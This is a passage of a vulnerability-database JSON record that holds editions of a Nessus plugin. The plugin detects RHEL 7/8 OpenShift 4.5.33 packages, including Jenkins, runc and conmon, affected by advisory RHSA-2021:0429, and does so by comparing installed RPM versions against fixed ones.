(!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-27T03:33:21", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "9698a5909ec2b527ec887130fba703c5", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-03T00:00:00", "modified": "2021-03-03T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.0, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/errata/RHSA-2021:0429", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-07-29T03:29:33", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FEDORA_2020-2640AA4E19.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "EULEROS_SA-2021-1133.NASL", "JENKINS_2_276.NASL", "FEDORA_2020-3CE0F55BC5.NASL", "PHOTONOS_PHSA-2020-3_0-0155_APACHE.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "REDHAT-RHSA-2021-0637.NASL"]}, {"type": "redhat", "idList": ["RHSA-2021:0429", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0719", "RHSA-2020:2618"]}, {"type": "archlinux", "idList": ["ASA-202101-41", "ASA-202005-15", "ASA-202012-5"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21607", "RH:CVE-2021-21609", "RH:CVE-2021-21615", "RH:CVE-2021-21606", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21608", "RH:CVE-2021-21610", "RH:CVE-2021-21604", "RH:CVE-2020-1945", "RH:CVE-2021-21603", "RH:CVE-2021-21605", "RH:CVE-2021-21602"]}, {"type": "cve", "idList": ["CVE-2021-21611", "CVE-2021-21609", "CVE-2021-21615", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21604", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21605"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1945", "UB:CVE-2020-11979"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "github", "idList": ["GHSA-F62V-XPXF-3V68", "GHSA-4P6W-M9WC-C9C9"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:52396606732B", "FEDORA:6869030D3139", "FEDORA:88EAA30905CF", "FEDORA:2D51F60C28B2"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454", "OPENVAS:1361412562310877939"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2020", "ORACLE:CPUAPR2021", "ORACLE:CPUJUL2021"]}], "modified": "2021-07-29T03:29:33", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-07-29T03:29:33", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/26\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n script_xref(name:\"IAVA\", value:\"2020-A-0324\");\n script_xref(name:\"IAVA\", value:\"2021-A-0035-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0196\");\n script_xref(name:\"IAVA\", value:\"2021-A-0039-S\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nrepo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE || empty_or_null(repo_sets)) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_5_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets);\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "p-cpe:/a:redhat:enterprise_linux:conmon", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T03:29:33", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "49189788eb8d9fe4aaf4ddd6a2706a71", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-03T00:00:00", "modified": "2021-07-26T00:00:00", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/147015", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925159", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21611", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21606", "https://cwe.mitre.org/data/definitions/79.html", "https://bugzilla.redhat.com/1925141", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925161", 